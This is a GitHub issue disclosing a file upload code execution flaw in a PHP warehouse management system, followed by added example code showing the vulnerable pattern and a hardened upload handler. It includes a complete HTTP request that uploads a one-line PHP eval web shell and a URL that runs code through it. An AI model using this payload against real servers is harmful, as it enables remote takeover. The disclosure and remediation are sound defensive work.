WMS has a file upload code execution vulnerability #14

Closed
huclilu opened this issue Nov 29, 2022 · 0 comments

huclilu commented Nov 29, 2022

WMS has a file upload code execution vulnerability

Build environment: Apache 2.4.39; MySQL 5.0.96; PHP 5.3.29

1. In /src/product/addproduct.php, on lines 242-246 of the code:

[screenshot: addproduct.php, lines 242-246]

upfile is the parameter for uploading pictures.

2. Then we come to savenewproduct.php.

[screenshot: savenewproduct.php, $upfile assignment]

The upfile from POST is assigned to $upfile.

Then let's look at lines 45-64 of the code:

[screenshot: savenewproduct.php, lines 45-64]

It can be seen that the uploaded files are stored in the upimages directory, and the file naming rule is 1.jpg, 2.jpg, ..., incrementing by 1 each time.

3. Therefore, we can construct a PoC to perform the file upload.

POC:

POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close

------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"

0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"

123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"

None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"

10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"

123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"


------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"

添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--

Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php.

[screenshot: upload succeeded, file saved as 1.php]

Then, we access the PHP file to execute the code:

POC:

http://wmsvul.test/product/upimages/1.php?ace=phpinfo();

[screenshot: phpinfo() output]

@huclilu huclilu closed this as completed Dec 3, 2022
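The report describes an upload handler that keeps whatever extension the client sends and writes the file into the web-served upimages/ directory under a sequential number, so POC.php becomes upimages/1.php and runs as PHP. The following is an added example, not code from the issue or from the WMS code base: a reconstruction of that vulnerable pattern next to a hardened handler. The function names, the glob-based counter, the MIME allowlist and the random-name scheme are assumptions; only the field name ($_FILES['upfile']) and the directory (upimages/) come from the report. The hardened function uses return types and random_bytes(), so it targets PHP 7 or later rather than the PHP 5.3.29 the report was tested on.

```php
<?php
// Added example (not WMS code). Reconstructs the upload pattern described in
// the report and shows a hardened alternative. Field name and directory follow
// the report; the rest is assumed for illustration.

// Vulnerable pattern as described: the extension is attacker-controlled and the
// destination is web-served, so a .php upload becomes executable at
// /product/upimages/<n>.php. The sequential counter is assumed (glob-based).
function save_upload_vulnerable(array $file, string $dir): string
{
    $ext = pathinfo($file['name'], PATHINFO_EXTENSION);    // from the client
    $existing = glob($dir . '/*') ?: [];
    $dest = $dir . '/' . (count($existing) + 1) . '.' . $ext;  // 1.jpg, 2.jpg, ... or 1.php
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened handler: nothing from the request reaches the file name, and the
// extension is chosen by the server from the sniffed content type.
function save_upload_hardened(array $file, string $dir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed or not an uploaded file');
    }

    // Allowlist of content types we accept, mapped to the extension WE assign.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    // Sniff the MIME type from the bytes, not from $_FILES['upfile']['type'],
    // which the client sets freely.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('content type not allowed');
    }
    // Second check: the file must parse as an image at all.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Random server-chosen name; no user-supplied name, number or extension.
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable, never executable
    return $dest;
}

// Assumed wiring in savenewproduct.php; the report only shows that the field is 'upfile':
// $path = save_upload_hardened($_FILES['upfile'], __DIR__ . '/upimages');
```

Two caveats a reviewer would add. First, getimagesize() and finfo both accept a polyglot (a valid JPEG with PHP appended), so the content checks alone are not the control; the server-assigned extension is, because Apache maps the handler by extension. Second, belt and braces for a directory that must stay web-accessible is to disable script execution there (for Apache, an .htaccess in upimages/ with `php_flag engine off`, or a `<FilesMatch "\.ph(p|tml|ar)$">` block with `Require all denied`), or better, to store uploads outside the document root and serve them through a script that sets the Content-Type itself.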